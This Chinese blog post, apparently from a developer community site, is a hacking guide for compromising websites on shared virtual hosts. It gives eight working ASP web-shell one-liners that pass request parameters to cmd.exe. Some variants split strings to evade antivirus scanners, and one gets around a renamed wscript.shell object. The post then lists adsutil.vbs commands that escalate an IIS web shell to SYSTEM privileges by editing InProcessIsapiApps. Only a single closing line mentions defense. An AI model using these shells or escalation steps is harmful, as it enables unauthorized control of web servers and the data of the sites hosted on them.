关于旁注虚拟主机 经验

拿虚拟机上的网站,echo是最好的办法了,如果asp的马cmd不能执行,可以换其他的试试,aspx的许可以,若还是不行,上传个cmd上去,有个专门执行cmd的后门程序

第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:

<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:

<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

当然,classid值在不同系统下有所不同。这个要自行更改

第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:

<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

这里代码引号里的东东都可以随便拆的,像还可以拆成

<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c "&request("c")).stdout.readall%>

第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

<%=server.createobject("wscript.shell").exec("e:aspxcmD.EXE /c "&request("c")).stdout.readall%> 
第8个,asp代码可以加密吗?
当然可以

asp 马提权

asp.dll的执行权限是IWAM_computername 是GUEST组的,权限很低,所以,许多人上传了ASP木马,虾米也不能干

IIS的配置参数在 metabase.bin中,其中层LM/W3SVC/INPROCESSISAPIAPPS里,有一些ISAPI的文件
而这些文件运行是又inetinfo.exe启动 的,继承了system权限 (黑洞企业版运行也是system权限的)

所以,只要将不属于 LM/W3SVC/INPROCESSISAPIAPPS 的ASP。DLL加到LM/W3SVC/INPROCESSISAPIAPPS里就有了system权限


怎么办: 系统里有个adsuti.vbs可以对metabase.bin进行修改

而adsuti.vbs在C:\inetpub\AdminScripts里

所以,先跳转到 C:\inetpub\AdminScripts里

查看一下原来LM/W3SVC/INPROCESSISAPIAPPS里有哪些dll文件

cscript adsutil.vbs get W3SVC/INPROCESSISAPIAPPS

然后显示出的所有dll的路径都复制下来

然后用adsutil把asp.dll添加进去

输入 cscrip adsutil.vbs set W3SVC/INPROCESSISAPIAPPS "xxx/xx.dll" "xxx/xx.dll" "xxx/xx.dll" ··················(也就是上面叫你复制的那些dll的路径) 最后一个输入 "c:\winnt\system32\inetsrv\ASP.dll"

注意一下 :每个具体路径都要加引号 每个路径都要用空格隔开 

知道了这些.知道该如何防止ASP木马提权了吧

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值